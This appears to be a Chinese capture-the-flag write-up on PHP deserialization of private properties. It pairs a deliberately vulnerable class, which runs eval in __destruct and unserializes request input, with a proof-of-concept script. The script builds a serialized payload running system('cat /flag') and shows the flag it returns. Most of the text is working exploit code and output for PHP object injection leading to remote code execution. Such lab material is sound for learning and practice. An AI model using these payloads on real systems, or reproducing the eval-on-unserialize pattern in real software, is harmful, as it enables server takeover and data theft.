serVuln6 私有属性反序列化

源码

<?php

class Virgo
{
    private $comm;

    public function __construct($com)
    {
        $this->comm = $com;
    }

    function __destruct()
    {
        printf("%s\n", __METHOD__);
        echo eval($this->comm);
    }
}

if (isset($_REQUEST['Virgo'])) {
     unserialize($_REQUEST['Virgo']);
     } else {
    echo "系统检测发现该处漏洞，进行攻击测试\n";
}
?>   

POC

<?php

class Virgo
{
    private $comm;

    public function __construct($com)
    {
        $this->comm = $com;
    }
}

echo serialize(new Virgo("system('cat /flag');"));
//O:5:"Virgo":1:{s:11:" Virgo comm";s:20:"system('cat /flag');";}
//O:5:"Virgo":1:{S:11:"\00Virgo\00comm";s:20:"system('cat /flag');";}

O:5:"Virgo":1:{S:11:"\00Virgo\00comm";s:20:"system('cat /flag');";}

传入payload，得到

Virgo::__destruct
Sonder{135d79-ba631f65200a5f-870225232871-7af1e740}